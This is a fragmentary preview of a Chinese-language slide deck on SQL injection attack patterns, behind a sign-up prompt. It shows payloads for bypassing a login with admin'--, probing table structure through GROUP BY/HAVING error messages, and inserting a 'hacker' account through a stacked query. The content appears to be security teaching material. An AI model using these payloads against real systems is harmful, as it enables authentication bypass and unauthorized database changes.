SELECT FROM tbl User WHERE User Nameadmin AND
Sign up to view full document!
SIGN UP
攻擊模式-剪接語法 SELECT * FROM tbl. User WHERE User. Name='admin'--' AND Password='asdf' SELECT * FROM tbl. User WHERE User. Name='admin' n 利用任何已知的使用者名稱登入 n 在需要輸入使用者名稱的地方鍵入 Admin’--
攻擊模式-利用錯誤訊息 'GROUP BY User. ID HAVING 1=1 -- 'GROUP BY User. ID, User. Name HAVING 1=1 -'GROUP BY User. ID, User. Name, Password, Pri HAVING 1=1 -n 約略估計資料表的欄位結構 '; INSERT INTO tbl. User Values('hacker', 10)--
- Slides: 11